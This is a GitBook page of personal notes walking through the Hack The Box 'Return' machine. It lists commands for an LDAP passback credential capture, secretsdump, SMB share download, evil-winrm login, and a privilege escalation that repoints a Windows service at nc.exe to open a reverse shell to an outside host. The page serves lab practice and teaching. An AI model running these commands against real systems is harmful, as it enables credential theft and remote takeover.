Notes
  • šŸ‘€About me
  • ā„¹ļøGood Reads
  • 🌐Web
    • Web Pentesting Checklist
    • Insecure Deserialization
    • Blind XPath Injection
    • GraphQL
    • Reverse Shells
      • IIS
    • Content-Security-Policy
      • XSS (Static Nonce in CSP)
    • LLM (Large Language Models)
  • šŸ“˜Windows API
    • C# - P/Invoke
  • ā˜•Miscellaneous Topics
    • Phishing with Gophish
    • Pentest Diaries
      • SQL Queries via Grafana
      • LDAP Pass Back Attack
      • Misconfigured File Upload to RCE
  • 🧃Hack The Box
    • Intelligence
    • Seal
    • Under Construction
    • Previse
    • Return
    • Sauna
    • Nest
  • šŸ“•TryHackMe
    • Wordpress CVE-2021-29447
    • Attacktiv
    • Fortress
    • internal
  • šŸ› ļøCheatsheet
    • Anti-Forensic Techniques
    • JSON - jq
    • Docker
    • Hidden Secrets
    • Database Exploitation
      • PostgreSQL
        • Blind SQLi script
      • SQL Server
    • C Sharp
    • Reversing
      • Windows
    • SSH
    • Python
      • Miscellaneous Scripts
        • Credential Bruteforcing a CLI service
    • Privilege Escalation
      • Windows
    • socat
    • OSINT
      • Shodan
    • Installation
Powered by GitBook
On this page

Was this helpful?

  1. Hack The Box

Return

PreviousPreviseNextSauna

Last updated 2 years ago

Was this helpful?

- LDAP Passback Attack svc-printer : [redacted] Domain: RETURN - Get NTLM and other info nmap --script ldap-ntlm-info <> - mscl impacket-secretsdump RETURN/svc-printer:[redacted]@10.10.11.108 - Downloading recursively from an SMB share smbclient -U 'svc-printer%[redacted]' //10.10.11.108/C$ RECURSE ON PROMPT OFF mget * # 5985/5986 [WinRM] evil-winrm -u 'svc-printer' -p '[redacted]' -i 10.10.11.108 - Get user info net user svc-printer - User is part of server operators group - Privilege Escalation evil-winrm -u 'svc-printer' -p '[redacted]' -i 10.10.11.108 net user svc-printer upload /usr/share/windows-resource/binaries/nc.exe sc.exe config vss binpath="C:\Users\svc-printer\Downloads\nc.exe -e cmd.exe 10.10.14.30 7908" sc.exe stop vss sc.exe start vss ======================================= OBS: ======================================= • null credentials? • Got valid domain credentials from LDAP Passback attack

🧃
https://cube0x0.github.io/Pocing-Beyond-DA/